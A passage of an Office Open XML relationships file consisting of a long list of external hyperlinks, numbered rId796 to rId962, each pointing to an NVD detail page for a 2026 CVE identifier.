Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81355" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81381" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81790" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83989" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84001" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85400" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86711" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86721" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86728" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19651" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69347" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71375" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76196" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78461" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81383" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28613" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28626" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28656" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45528" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86806" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86733" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68835" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68846" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68889" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68893" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69272" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69274" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69296" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69305" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69313" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69314" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69336" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69337" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69338" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69340" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69357" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69358" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69364" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69366" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69384" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69396" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69451" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69460" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69482" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69536" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69553" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69597" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69602" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69688" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69706" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69757" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69761" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69775" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73321" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81781" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81798" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82076" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84817" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84818" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84820" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86074" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86081" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86713" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86718" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86724" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86725" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86734" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9331" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50349" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58848" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62653" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62654" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62694" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68824" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68825" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68837" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68847" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68884" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68897" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69275" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69279" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69280" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69281" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69287" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69292" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69299" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69300" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69309" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69310" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69311" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69331" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69333" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69335" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69341" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69362" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69379" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69383" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69385" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69388" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69394" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69398" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69401" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69404" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69410" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69430" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69440" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69441" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69448" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69466" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69468" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69470" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69472" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69473" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69488" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69492" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69498" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69500" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69501" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69516" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69517" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69540" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69549" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69560" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69563" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69564" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69567" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69573" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69574" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69575" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69578" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69581" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69600" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69605" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69606" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69610" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69611" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69613" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69617" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69621" TargetMode="External" Id="rId962" /><Relationship 